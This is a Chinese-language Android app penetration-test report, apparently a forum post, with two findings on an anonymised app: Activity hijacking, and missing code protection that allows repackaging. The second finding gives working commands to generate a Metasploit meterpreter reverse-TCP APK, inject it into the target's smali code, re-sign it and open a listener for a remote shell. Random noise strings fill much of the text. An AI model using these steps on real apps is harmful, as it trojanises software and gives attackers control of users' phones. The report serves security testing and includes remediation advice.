) n, P5 ]0 E, B% w; P & ]4 S0 D! o' ~1 V

, S; S' s; E1 J+ Z5 M% E " q+ L' Z S1 y0 |$ r 2 检测结果                    0 D: z; }: W; Q- m0 U : I1 v; |. a: o* |

, D( Q5 x8 T0 u& M5 F6 T/ Y x' H4 R, d2 r$ R9 K, D; ^& U$ k5 W

) {. Z B% X- v' `$ \& j' z1 ?; i9 |1 [" A- i 2.1 某某某 & S' D# _0 u S4 b. ~" P7 M 0 ?/ S4 M! @4 T# V$ ]8 M* v0 H

8 u c; S5 n x2 v 5 V v* b/ I+ k' G& \+ h* T1 e# [

" u" C5 \8 i! L; t4 k ! O6 ^6 s- v" I 2.1.1检测目标 3 h' r) C9 ^* w% H2 V * k5 C" h. e! W0 S4 F* b9 {3 m0 N

# B" f3 K0 e4 v3 D/ u2 S* r/ T $ ^# w7 T% t7 s6 l9 g

1 u1 e' f4 ~9 v9 I0 X# D . C1 x3 l9 q1 W& y 目标地址: 某某某某某某APP + N8 v2 V4 G& E7 r' A0 l1 A3 M; ~3 F! P X, e, a% s; c1 _* E

# F/ v" M8 J% W+ |4 h 8 I3 F% I0 O( M G0 G1 B T

$ L1 T+ U2 `; Z2 u) V; i) E " _/ a7 t' G* p 2.1.2检测结果 ) }3 b: I* e( l / i, E: |! R+ P& `* ~1 ~: z. u

( k: O& c. W7 D# `; U1 ]# o/ @9 v9 w. t9 Y3 f' Y6 \: G; o

t0 G; M1 m8 w: H m" s 9 U4 N4 D' c j$ K 2.1.2.1 0 {, D9 b$ v8 \1 r0 i 2 X, U3 n) Y' i( u: _2 J

& n! ~+ ]9 ~! i k: s! T3 v; y, e ! y' ~# P& {$ p; t# Y+ I

2 w, V4 a- i6 \# W7 J2 O1 ^ 9 R$ W% G, J% s 漏洞链接地址:某某某某某某APP ! @$ r k; w$ A9 X( e + J' x+ i4 r0 j( `' w

! l& f* p+ k: v0 \8 k: h- q, ? N! T! N

- o6 {7 u3 a1 k. w4 o1 J9 F* Q% e. i! Z ' h j# T, Y3 a6 T) ^   % J( q) u6 ^6 @6 U6 t) o 8 }' |- c" a) a5 ~6 Y1 I" f6 i

6 I A. A5 {* ^; M" q, z4 `/ f" [0 a6 E5 ~% |/ q3 B/ h% @

8 c% C2 {+ k5 C/ i: X $ ]$ C+ K1 U4 I( p 漏洞分析及取证: * L( U" P9 g9 v; s+ t; I' n$ k9 ^% M8 O. C3 @% r' ~! N! y |0 h& u

* a5 B- E1 Q' e& @: s ?7 i1 I0 u+ _! _( _8 n6 H8 G

6 z0 j/ ?1 h" k/ @2 N 2 `! d2 E, [( q& T6 ^0 `- H                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: ( K* i( _7 C( _3 V2 P( W 9 z; a; J# Y+ e. o5 {; F

8 Y2 x( t" q* }* W. v' n 0 a0 I5 k; W v/ D

* l. d9 K1 Y0 }% N, J N5 L# x- R3 D6 l      9 D1 O! G8 G) }. w' u9 ]6 B. V { 0 ?0 s# S1 F3 U6 @1 n5 x

$ I- s/ B7 o0 A8 L8 c: J2 N . u+ Q- {1 t/ j

% g; m5 H7 H0 N& J/ W3 I n% \ X$ a: S3 [- l                       4 \$ ?& K- Q& F2 k9 d0 U: Z8 C 7 J4 Z6 p' l: J. Z8 o

$ }& Y# L3 |' @" k7 B4 T1 g+ l I; f/ J

# E! Z$ B2 A- T' r, k& t5 U & e1 m- Z+ C O, p7 K 9 G4 |: [7 S: j: x4 b! Z5 l 3 M, s7 w7 [6 L) A4 o

2 y8 C: D# }5 D, `8 r" O/ V$ w; X c 4 d) s: _0 O' U. j

" Y8 D% K3 o% ~6 C3 w5 c + L A+ g' J! B6 _8 D+ g % x6 s9 t; r0 E3 Y" f+ _1 K ; G' u0 V0 G/ ?; ]2 ~ U( K2 G

4 r, t7 T4 q5 n2 h5 @2 H6 U" T# b( n* B7 m8 i3 K4 }( s8 V

, e/ I, G$ X- Z% \$ F + |; Y. S) g" H& m; d # |* D1 X4 r1 y6 F7 L8 G . @' K- p3 ]+ B0 _) M4 x$ `& V$ p

) y! i* l( y! }" O. x7 A+ c) Y+ U2 T, S! G

/ C( V% G5 F* X' M5 f & [9 g0 c/ h; v1 R+ v& U 漏洞危害:高 6 d3 k+ E& G8 g& j' b0 P & @* f$ V' @. b% C& P

" ^& x$ Z; f, Q1 ?1 f 5 N3 r+ B% N- j2 H# Q) r
, v! Y { X) N E * d0 U* o0 Y6 |& i" u- \* s! r ' Q, n0 A) T( s5 W6 o3 N1 ~7 e; o9 y, r, Z: u3 I; m- }) r# ]' _' V) X2 O# H7 a, Y6 R4 {' g6 j* K1 f! C: i2 _9 S+ _2 n# M \% V; v7 U% r3 e' ~' ~ k0 u; h9 i! @' V2 ~5 f# Q* I/ {5 v7 H I* I% g0 i; Y, S7 J4 N& J. `( U$ u9 L1 f# W, }# J9 F: y6 m+ }8 ?+ H1 G$ V7 O1 J% y$ R( _$ v6 z- k; I3 }' W, ?- q V) b- D5 e+ N) f3 I1 a% Y( B# Z% j6 M6 P' m& x: C$ U: \3 z7 O% B0 q3 T: X/ I1 ]3 x W- d* B. C! b$ c, Q0 ?2 Z4 S3 I% N' |: p0 _$ L: p$ ] f4 K) h7 ^( q: S1 j: j3 b) j% Y- M+ K& S7 h0 a3 y. d, k' K) v3 m p, E* I$ j1 }9 D5 n3 S+ W* P; o8 A5 I% W2 s: h8 J8 {* t
# F2 e0 F3 \3 j B" i 4 Q: F) D5 H( @8 ]8 [

* b/ e, O0 J8 L9 b, O # F7 E' a+ U; n* F/ s 严重程度 . |( m: t& S7 Z- j* `- L# p! J% ~% D' e5 ~6 ?

+ T p: }! |/ l% N5 _ & L9 r; J1 r$ _) l+ C$ E
& t0 k+ V# U' s A. @ |3 m7 N* c- ?. R2 E i3 m

' F- }0 i4 }. u) b7 | 9 Z0 ?! ?) ~, O0 X# s, u8 c) O4 U R2 l% U7 }( U5 M5 u9 E W2 }" c2 h' I2 J

, Y2 E% p! U& ?/ i) J % k9 {, { c- k- @& i
1 B# A2 q; J5 I2 z, L7 n3 w7 Y : h* b% H! W2 a: k

a- ?" ~; t% P4 R4 K + P: }, O, N c. G3 X7 T: h : p5 |% C* d/ \" {& W) I, }4 m " ]' U1 T9 K% X* G/ f7 _/ |

1 ~' e1 a0 Z" M- O 1 `) [) C. P% r3 c- K0 o8 r" t, t
/ W. C1 Q' K% D3 z . P* Y1 O% Q @: v5 y) I

1 r0 H( s, s! R. | , G$ Q1 n1 n3 l' F; C" g ( u. f ~" C! t, B5 T; A& y& |7 B3 @

/ y" Z7 |1 _; ]& I; [ # c) d Q: p& Q; B! B0 K
) e& p7 p% F4 l* }; ~ ( _8 `, E. U) F! L( J

2 t+ k" c# I1 B1 |: s+ W f% \8 |) }9 \" v5 y" m/ ^& P3 a2 J   6 R6 K% t0 X$ V( t3 P - }2 ], J. [. B; c

, j: F& n/ P. C% B" f$ ^$ }2 P8 Y, Q/ Q8 o: s/ A1 q( C7 ^" [" X
- p+ [) u" v# r1 {0 Z; a) J' X: @& d ' o6 M0 w/ ^- i( [! T+ [

$ J9 ?9 r, ^; @& V/ } 5 c( H5 L; z+ S" ~" o$ [ 2 e* i1 ^3 w( M, L8 | 5 ~! l: P5 ~9 N8 Z9 f

! ~ o/ w) c3 v @) _* T1 M ! h9 n' C I, p# o. p9 ^
8 \: C6 C# i. e3 J& E5 F : I1 q; Z. a2 O6 h3 [3 h( {

5 P: p( j8 ?2 R 9 \6 y- r) Z1 E6 X* O# l   5 w( D: {' o2 {! E! C5 }4 ]6 g' L( W* R, S

! j6 j0 F" w! C- l / _$ |: X; }0 a7 g0 ~( r# ]
$ w) d0 [ E& ]2 L 1 k" {- C8 E1 r( c* [
% K. v. @+ o. q+ t; s ( g+ h* K5 f5 Z7 z' F+ b0 l

' X4 M$ F: f8 r3 r- s1 r4 X7 z% X. L   2 g9 r# K/ k/ f% Q " M5 _% l$ V9 S& u6 X7 _. X

/ x5 G- W/ Y' O5 m4 `1 x% n; F$ _5 K( R& v* d$ X$ j$ l

5 A1 X3 n+ C5 L$ K- V3 S% ] % t5 {) t. C* K) o2 I2 x4 s+ _ 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 7 X C b, x3 s, K( z: @$ q: I: Y+ `: b

$ |- {1 T+ j8 t , k2 \1 U2 @! s3 }+ T$ h

) \1 R$ i5 v7 P. v# I* v$ [0 u 5 D- y6 q2 q: m% R+ T2 h5 \ a           3 |8 R9 f, d7 q+ S 9 K9 C# |2 U$ \2 w5 y0 W

0 b5 E( M: g3 e& I. e3 L 7 F5 ~, z+ ~+ u5 T

+ p% ^' p1 J# |& N" R5 M 9 l, G7 R2 O8 J2 S) q0 [0 Y; y6 {   8 d4 D3 D+ v% L) ]9 l! U( N - N5 {, w9 e9 O0 d9 J8 T6 A

& i3 C- u4 k' Y5 g/ o9 @3 Y 3 h3 O& b- @% V- R Q2 l

/ x! B9 y% A/ H) K, J H0 P$ |# ] 5 K# E C& @5 M! G* [2 b" c 2.1.2.2 ) Y: m- E2 b& @3 C; r g O ; B# Y% @6 p& T5 ]" ~" n

" g( q# |9 O4 p' e* b! h4 Z: f9 _8 |9 C+ b; |% I# R" w& Y: G* ^$ X; V

H0 b5 |6 r3 f $ p: G% ?% F( o* y2 A* m4 \ 漏洞链接地址:某某某某某某APP $ v& ?$ P7 n1 ^# p& D " S" h$ u* y' h* F" R0 X

# N5 V& L7 x/ V) I1 x v. e1 C' w! | ( G8 D2 |; A" M( L

+ Q% K' ^/ W+ N& S9 } b5 B$ x" @0 c8 I f 漏洞分析及取证: ; d) n8 l/ y* k, ? 0 h# Y$ [: p- `- A& _/ J

+ P# P, X% ^7 _. B, U ; s- X! r5 j" _7 R0 r, S$ X; w

- B1 n' l' A$ D/ F ; |: ^; R! A( K1 f" W' T' d+ `: ]                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 7 r2 w( R1 ?" ~+ f7 s+ u. p& D7 S5 c$ g- Z1 [3 @1 ~# R. Y+ j; N

, q9 i/ r: b4 f1 Z% i4 ?$ s$ L 9 b' W/ ?. D/ w! b" G' G, ?1 v, d

& d! o7 ]4 O/ H" o) m $ c* J( [. z1 v Metasploit 生成木马 apk % ]2 h6 P4 _) e4 {' B4 }+ n) q9 ^, n( d) q6 u( R9 C

9 n; o: `9 D: |3 |- v ?$ L( ^ 4 n$ u2 n+ m. Z3 X+ ~* y) r

0 U) @; }; O9 H; t s! @ 8 \, y, L/ h$ _6 [5 { msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk / A" w' V1 q1 B* C - J1 b9 b A! U0 g

* P- s% l% `3 v$ A5 y/ [+ L " T% i( N. A- A% U' v

: o& Z0 m$ ]: e ) t2 Z6 Z; u( ]1 c 反编译目标apk和木马apk ) c; j! m/ C( N" F8 S ) P6 l* Q/ |7 t8 P

7 s/ i5 ?, F M7 ]0 z / N" b7 Q' [0 k0 }1 [

8 z6 Y3 u8 B4 r% p - j6 L$ [1 n" C6 U& T2 A apktool d target.apk
, Q2 k+ G b; {- ~: |( c - { i6 G( }0 o& S6 b* E, I apktool d cockhorse.apk
5 ?) r& K) M3 V$ V( z! P9 m * `# l7 \. U" B1 P+ j# N7 D

5 x1 j7 R4 m9 t. d3 F. j+ ~: G/ a! R9 w, Q

7 h" w# w5 J Z/ u9 t3 r# A3 o7 _1 m( `' K" X: }% i% G 木马 apk 注入目标 apk 5 o* f/ d" N1 M5 g) ^* e/ K4 }- t$ l) e: ? o& R9 @+ ?1 L

& R- o4 \% }8 R ! q0 q+ A8 |9 X0 w9 _. I

/ [; }4 q$ S9 g! C* \" i+ S5 q! x7 W$ F7 r: ~ 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
& u+ e: t' V1 E2 R/ O5 X8 v0 b! }3 | - G1 T& B# a% Y+ F2 _ invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
' r8 f& U/ g/ b/ q- c) b$ W+ Y1 M8 O

% k) k1 `* \6 X; V h/ b( O8 W7 x* s: }. U

2 z9 e9 s8 r5 e9 h 7 l3 K+ Y6 o X0 @9 U 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 ! m) v; _" P& W1 H% `" a# G" g$ z6 U& I: G$ v& _

* }. i* U4 E) \2 ^% s2 z/ K6 C F7 v) T

4 W( ~% C( B/ ^4 R" ` 2 ~) V8 }6 X: _2 t, r 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ . v( H9 T7 e+ h/ x0 Q7 N 7 h& }- R6 ]; Q8 Y5 d% @7 w% V

" l& q! F0 u! ^. R( s a& P" x+ f! E" L3 Q

0 K) w% j* p0 C4 ^9 h8 b9 o) G+ K. e. G/ ^ 回编译生成最终 apk : d0 B* H0 s& A, ~& L6 R+ I3 n' p5 j

0 W0 T2 B# Y$ I, ~1 k0 ? + k o) l& D1 J+ K! r

' g% }/ ]& @3 Y, U& w " `4 a! Q. V9 r8 B( ?$ a4 K 重新打包 0 k; M* g V' u+ [5 g - t" e; |7 G1 H, D& |( r9 E( U

6 z, W1 g) E1 F2 [3 Q. |" \4 h" U7 [" n/ }6 {

! H+ T* J- s- m$ |% ?: h4 F u( ~& P# R7 p/ A$ R apktool b -o repackage.apk target_app_floder 0 n Z& R5 `; T& M; f% J0 V* e V 4 W5 _& }& W' {

! R; k" n: f( x; t6 l, @ 5 V# {7 U; q' N3 d0 I* k' V

! j1 X) p. y8 | + n1 O9 q. q c 创建签名文件,有的话可忽略此步骤 ' z6 C! ^' \4 Z7 X# F' M5 ^! ^$ E# ~+ f

5 o; }- X- Z; {. P# w ! h: C3 ~7 l) l/ b7 l. P5 z4 g) v( h; U l

+ x D/ i* U- q" P 5 \5 c# D4 S X! }3 B( g, u& m( | keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                ; e$ z4 _2 A& B8 \8 ~8 R) h# P2 U& U- f+ T2 w

. ?" l0 c1 k9 r' ] . q& N5 e- ~' k. R! W, {

9 L3 n3 ]( ?. \" f M " C( o% @5 G& u- u& C2 H4 d 签名,以下任选其一 3 T7 K. y- m4 l( A9 p 0 h. L3 Y! F- z7 |5 E

' e) \- G2 q! v7 \6 | / e8 k' r; A+ j6 g

3 D7 L) R9 K+ C9 z 8 ]/ N7 b3 i8 G- O jarsigner 方式 / h2 i, |: s# Q" C8 j, W 7 f+ `+ B, H% P1 J

+ G% D* _; ?1 b- t/ L: g8 ?7 p- B! K5 r G) D

) K7 n p' a' v1 g0 V 0 w. W( ^, B) M, \ jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 6 p9 T" w5 _( d7 C/ w- ` 3 X6 W* s* ?$ K7 ?8 y9 y

& q4 f/ w' V4 `0 V' Y2 @1 R/ U# D; K# K0 G, C0 G' U* O8 h

4 J3 `# m! C# K8 M$ L$ K! ?% y7 i9 z6 A/ T# f" L' D# R apksigner 方式 0 S' ~% R" D. {3 Z% N) N g, K8 b9 W; N$ E

) l j6 j. ?8 C0 i1 K: H0 Z# i 4 r2 w, Y8 a/ b2 I" `! S5 k6 c C: H+ T

/ ^9 y& s* r9 {6 r/ i % P' t" k2 q8 B) r apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 0 O! i8 F$ x4 i4 W 7 l# R" x2 [$ k F& v# S; n

/ s9 W) w2 M8 Q; J- O/ b . _" Q; X, t/ J4 \: x$ Z

1 s) S/ P7 J( E& C9 j# G & I$ W& L7 J* F; H/ {6 W3 M 如需要禁用 v2签名 添加选项--v2-signing-enabled false ! `% J, {1 \% S8 X, X : b: {/ c; o6 Q# O8 M

& e$ j, @. B( j# Y ! j4 P& a9 O2 Z2 D4 r; B* d

( n- u% V$ r9 d4 d 3 { v9 u g* ~4 h2 f! X# e 验证,以下任选其一 ) R: E) a# X) z7 }# a4 ` 2 X4 {: J0 f( L: n

! O( f1 i, z, r) Y3 ]; H4 X& X9 ]1 t. e' T% _' D& ]

+ e/ n$ _( B' |1 U' D, C% u! G/ S$ A4 t0 y' M+ z! W9 N2 d$ X jarsigner方式 2 g$ \, G# P% m$ c5 _- F$ e) g5 i I: ]/ b$ o

4 _! D1 I% B, L ) G% p) R9 N- P1 m

- t' ]" W' m8 ?3 ~% z * ^, l" Z" P3 @ jarsigner -verify repackaged.apk ' I6 |- r4 x" Z, ~2 h6 k$ D0 j 9 f* H* V( C I( t& d

& @* @" r( o( d& Z; U' }. t $ d9 _; ]% \2 Q' J- ?

1 H" W; e- Y2 x9 g * ]0 x: l* Q8 a$ w" h apksigner 方式 ! z( j7 c& B) q7 I5 x8 U, u: S% g3 U6 G7 N. n1 v# u0 W

0 {! {% u, h2 \ . M% w" `8 v) ]$ @

" s- E- H( W( G3 z ' W9 H. ^8 n- y apksigner verify -v --print-certs repackaged.apk # w3 y' _$ \9 r . O! [7 z& t" ~( T* `3 p c

0 f" w- x1 |4 u: J; i, O3 q# m$ N* z2 p! @( ~5 i! J7 I+ i

- W2 c: o( k) z* ?) Z- [ ) Q6 A! X7 `2 K& w f6 N keytool方式 0 l5 ~ v) H) t$ [+ R* h 7 H2 M; E, D2 h, u* f M

) c# P' I5 @* ?- n2 G" G) a/ B ' v* Q) I) f+ N4 \. |! D2 j( _/ V9 j

9 A! n ^. w6 G- s* y, F 7 W2 |9 @7 N* ^/ O0 X0 m4 n keytool -printcert -jarfile repackaged.apk 9 t% ], I! e+ i+ j2 ~ # x- {" q6 A! p$ d2 A$ a( X a

4 l; p; P2 m6 Y; X G& g - Y8 I7 l( m0 o* a' U

8 v |+ ?) f# f/ T& ] 6 a; T& L8 J. E7 U: p: w 对齐 ! L1 [. G6 g4 K i$ P& O8 z P $ G7 P7 ], L) ` F8 b$ p+ T: d: n

. H' H9 b9 q7 S( m 8 R" F& N1 |2 N1 b s3 P

& e* H2 t9 Q- I' F; e% s/ ^( r " L' M. a+ x$ @; @2 b 字节对齐优化 6 ?/ v9 q% R8 o; }! l4 g 7 w' n& Q* p1 G9 k2 z- _

^$ j: V6 ]/ s0 k6 e . P0 u( x Y! T" ]- h

$ S4 A' T; M% z c) T ( j( A$ j2 Z3 H8 C$ s- V zipalign -v 4 repackaged.apk final.apk - g) ^( S% v& K- ]* B, i5 m# j. }2 N' s4 O6 A/ y0 y

" r# W# x: z& L9 o5 E ! x+ s) |2 {/ R# F$ ]9 F

. x0 W- ~+ c* ^* h2 I o. V4 U- r: q& p- @% l0 T! v) |+ w 检查是否对齐 , i. e3 D* k, d" z% q/ u0 d ! K E! N; T: F+ M/ {% c

# G8 R r5 _) b. a. K+ n4 q $ h. L3 ?3 w5 q& v3 {: O2 Q/ h7 h

* I9 @6 d5 F/ F Z& N: Q' ^8 W6 H% G; \7 x zipalign -c -v 4 final.apk p Q7 b X$ M# ~6 R / P! t0 i% E$ T k5 X7 e

, L* ^+ @8 C1 e/ ? ' G- u' c& ?' u' O) z

" M$ u8 K: t4 ^4 K ( S, r: Y; ~# a& s0 {0 s 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 : U' x! ?' i" v; f6 Z8 `6 q8 Y0 | : |1 M2 o5 {. N7 v H

) `7 a8 |4 q. H% M, X5 a " f; D" e% W: i' Y$ T4 P6 F" n9 j

; F+ j u' R6 s4 g2 I2 q% ]7 u5 e* V( v7 }8 H* p0 c" a& Q4 q 启动Metasploit控制台,配置参数等待上线 * Y9 F: W; A/ c. Z3 O- ~ # X' t Z/ s: q: p9 E$ j( L6 q$ i( J) O

, w8 y% t- K! x7 _# R1 _* C; w8 d1 W2 ~9 G+ ]

# g3 {9 q' L' u/ b& [9 S3 g- x0 b% B- R- h, R 在终端依次输入如下命令 " x* C+ E; U7 h( Y8 ] , J& |8 {4 |/ g6 C

. S! K, D) K9 B5 f! _1 Z- D% I- g2 ^& B# C9 y

/ u! \% b- ?0 z. b/ P C& K! q3 A; s( p, j7 g msfconsole 7 c0 d6 t! H3 ~: i! C 8 G, w" L* o9 R4 X, T, @0 I$ M4 \

6 \; m( E- w9 e: \, N2 L% H7 ?" d2 L# |6 f

: A) a7 R- ~' w+ @( \" J+ Y 0 Z4 W$ f6 U$ ?, s! B4 L! t& o' g# u use exploit/multi/handler ^, E' G+ l# u. w& p , ]3 Q& j: w7 d/ C% X

4 d `, X1 p2 j. ^$ m+ v+ F ( E: k; B( @2 G4 [: n w2 `" B+ ?

, o0 y# S7 y6 j8 A$ M: |$ p 7 o! w8 M5 U6 p9 Z; d0 ` set PAYLOAD android/meterpreter/reverse_tcp * [9 w/ Y7 K, m8 B% J' z r. i5 O. V9 V, S" X

, D' d5 C. x( Q. Q5 p; G+ s$ c) c( H 8 j% d' l' C0 p: K2 k, M/ s/ i6 `

) ]# x, A1 _* I/ y5 q4 F- b8 v& v 5 R* `7 W# d, A; _! W/ G, F set LHOST 192.xxx.xx.xx * S8 a( k; C- m : z+ n# Q0 J9 g+ L% R7 K; t. { _3 _

0 H* p) d. D7 @ 6 D% P5 P0 U# Z1 j4 D

2 q7 R, u( S4 O/ ]* n 1 G: v1 [, T- |* E$ o7 C! @# x8 }; b set LPORT 4444 ' L/ H M' \8 i% I 9 l* u. D+ ~- k- ]$ B: A0 U

; K! l2 l. D0 o5 @5 v! r; z$ }& G

. k% @9 N* x8 l5 F+ ^8 Q/ l' r/ P( B4 \ p( [! x$ x! r exploit 8 [" O; ?9 _4 J/ M+ V 9 Q/ g( i# F) W' g- j( ~9 T' j

v8 Q( E6 D9 \, P; s7 d , u4 \; k# W: U$ r

& L# w4 ]/ G: n: Z" ^. h( U* z8 V) [. N6 k( n# T6 a8 f v) {& F 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               ) E' ?! x* H2 ~+ e2 J" A4 D! x 5 ?7 @+ f" _+ N9 E# G) ~. b

; Y( V- t7 f3 `2 J+ _ # N. i5 W# I% @( e: h/ U8 q

6 j3 E0 ~$ O9 k1 S: R, B0 M4 l+ J) M& D# q- B$ p 漏洞危害:中 ; n* u2 e* O& s& x8 _$ x/ K/ i 5 R) n! M2 m$ z8 ?3 \$ T

) Y/ F0 i" l. |8 {- [ 3 ?9 p& l2 Z: h0 v
1 A" b1 H+ ^9 @$ r 5 j- S* r; B X8 `( j ' B; Z \, p9 l& H v9 l 7 z1 j, B2 a# L+ _4 w5 U 5 y2 y3 ]$ e5 E4 Y ?! [- V+ z1 V2 \) |1 W' F6 W! e( T2 p5 Y6 k; Q t& H5 n) m/ ?' c; h- g4 e0 A6 S( K7 q `1 t6 q* w$ U; {6 w1 i9 f+ G( c |- D$ A( B& U+ Q& H! G; U1 W5 z; c( m6 `' j9 M* A$ }4 M, z: l0 ]+ _0 v$ [. v, s" \3 U$ P6 Y- C0 T! Q3 ?2 _( f R: J' ]$ C8 z5 n- h4 k! k, e& ]! f4 E. ~8 a7 a' u ?% W5 m/ x" v- y; A. @8 N2 x+ D9 h g* v# E! e: r& c4 y. ~- y' \; ^8 M2 a0 ^# D! h* Q$ g2 ?; z8 E _! w Y$ a& v$ d4 s( }$ c, J, q- x. K u! A1 y2 t6 V: ^# F2 k5 i4 G8 k* S8 N7 ]5 a2 O: ~6 y" g2 Q$ M2 Q1 t9 I, b+ |& v2 V) o/ p( A9 R0 n
9 U! u7 W. o7 c" j* O" z, A . L. {. R1 q% r

% M; f1 s) H4 K" n 0 F7 R- z N7 p! p$ O: s 严重程度 3 Q6 _8 @$ P; h& U8 ~ e+ d1 F " o) ~1 N% g7 U# N4 |

# [; K+ y$ B( Q + N- X7 g: [2 H; R& [2 s2 {9 y4 i
5 U' X. J0 D7 y& I; A2 u& N# w- y- y% o6 I/ ~! L

. L, C* m% x' q. e: k( Y6 b; r2 O. r' b/ C) A 9 Y# L; z, i& g- n' h $ I# A+ n% g: T

& i# a5 ^3 f5 @7 j( H1 ^; P2 S, X9 N! r- x
& W8 j% N1 D: [ 8 Q. |: Z& h# H

( y0 K$ Y3 q }$ \& @, q% r! g+ d) u9 g- y' B " O+ ~" f* b x- f+ G% T$ ? 0 W. a+ V) ?/ j

/ w7 R2 S! B) J+ h- l }! W1 t0 M' Q/ D" N* v+ J
9 E3 [( H1 w$ c: f4 e6 @( p 4 a. D, p4 X9 x' Y

; e6 A6 [) [0 U6 h 8 h, g) R3 a4 i7 _8 V) r/ k + V- p; R: K Z5 ~# Q' J$ t. y! K 9 R# l2 N2 c0 y' b" h' E

O/ u/ j3 r2 g0 h% e5 P % A4 C- n" B7 ?5 B
/ c9 W* o; v8 h) @6 ] q# Y( m , f$ t2 I- u& _) u) ^5 U : j& B6 K1 S( U+ f' W: y8 h4 h8 F0 L+ k3 p- [( o. n; ^" {

$ @, [0 g/ \( r: V4 t/ k" @ 0 T: x5 @9 f; x% \   & V0 m; m U- B2 y2 p . h: F. ~3 m6 L c7 R: E

8 A4 k5 @& ^, ^) Q- {4 \! B( N $ U: u* [' N4 d. @ Z0 t
* p- v1 ^+ u& {, Q% g3 } 0 p6 d4 c1 F' O( q. m1 I

$ ~6 D- H5 r5 P! l 3 W. t' L2 Y4 j X1 _% s3 O : m2 U$ |& u. {5 w5 a3 O' W6 g 4 ]# ?, S {1 V9 `2 i4 J {

3 }: ?( {% B! ~. y6 C( i% }$ _2 e& ^* A2 k( [& a7 t
2 J7 x5 x' p- L& W $ ]0 |% w' G- O2 p 1 T7 S* \; `9 f, O( o $ }2 E' c9 q& }' N/ D6 A/ P

3 o ~; E2 a1 l. H& R( ?! C& q4 o8 C9 Y   ! Z" Z8 j k- f 0 O9 p1 E$ H6 L; C2 A

7 Z ^% w1 K9 {. K, z+ r$ M' C" B. ^ ` F4 A o- [4 H9 Y7 d
. q! x# F. P+ ]0 Q( S 0 P& J$ X0 Y* m" n# `
- I4 ]* p+ P& ?7 I! s5 f1 i 9 q. @" h: J* w8 Q, o$ O5 {5 n Q' r3 u

/ S. }& D! d3 J" t- E: h8 R: e& J# f: r h4 d   4 K' y v$ `, d7 w0 l. a7 _) I, { 1 @% d- x2 w* ]& W9 S! ~

/ l/ _! f; I9 t, V4 N3 h0 P' z 8 I5 E5 m9 \* X' l

+ Y m% G6 u2 e7 H. F# p* h# Y S6 o 修复方法: / m. J4 E# y$ r0 E/ w! g) m2 m ! B! U# U7 P5 `

* ~/ R0 M8 ?+ F6 L . l: J' W5 l2 E, i. Z2 }: _

7 A9 B5 {0 s. q; M" m , q1 |! N! J& f               1. APP 启动时应做签名校验防止二次打包。
' {7 D( I: ?! {$ U( w, b 8 D6 T* W6 G. n. S 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 / Z8 P, V3 z/ |8 I/ S6 S ' g6 _( `# t$ J' x) d" x' W

" J' H6 p4 u9 i8 e( M8 \' p % t8 l) j& d5 P1 P5 }: h$ k, }+ G f1 a& o, E' v/ S * [1 ?9 X( S0 g' E- A

: ]! ^$ [' [7 A8 A5 X. W& o3 m- k/ m3 z+ a4 `. ~; d4 [   . p9 K2 c& F, a9 ~ . a2 i8 i) r" R0 v: l' ~' O

1 S( f7 m# x; ~$ i2 R; M) Z' | 3 U7 A1 K3 k- Y3 h8 m+ [& T1 d 0 w2 r# |0 i6 Y6 a. V ) p; Z. I5 O5 {9 r0 Y

/ _4 T: W4 n7 G" d9 S2 o0 g t( Y& |& Q% D, S. _3 y$ }, }; ]
$ b* R% D% S0 h% \+ l( M) K/ w" ?9 s @9 C7 g C* t+ J

$ k) i' \ y5 ]# \6 P( D + H* k; X+ ^3 {& \. Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表